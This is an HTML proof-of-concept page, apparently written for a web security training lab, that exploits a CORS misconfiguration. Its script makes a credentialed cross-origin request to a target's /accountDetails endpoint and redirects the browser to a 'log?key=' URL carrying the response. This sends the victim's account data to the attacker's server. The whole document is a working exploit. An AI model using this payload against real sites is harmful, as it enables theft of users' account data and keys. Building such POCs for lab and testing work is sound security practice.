<html>
	<head>
		<title>TrustedSec CORS POC</title>
	</head>
	<body>
		<h1>TrustedSec CORS POC</h>
		<script>
			var crossoriginget = new XMLHttpRequest();
			//The target site with the bad CORS configuration
			var url = 'https://ac551ff31e8c57008093021a00c7008f.web-security-academy.net/accountDetails';
			crossoriginget.open('GET', url, true);
			/*  This tells the browser to send the request with cookies;
			    requires “Access-Control-Allow-Credentials = true” in
			    response headers for this.responseText to be readable.  */
			crossoriginget.withCredentials = true;
			crossoriginget.onload = reqListener;
			crossoriginget.send();
			console.log(crossoriginget.response);
			/*  Once the cross-origin request completes, attempt to read the
			    response text and send it to the malicious server using an
			    HTTP POST request.  */
			function reqListener() {
				location = 'log?key='+this.responseText;
			};
		</script>
	</body>
</html>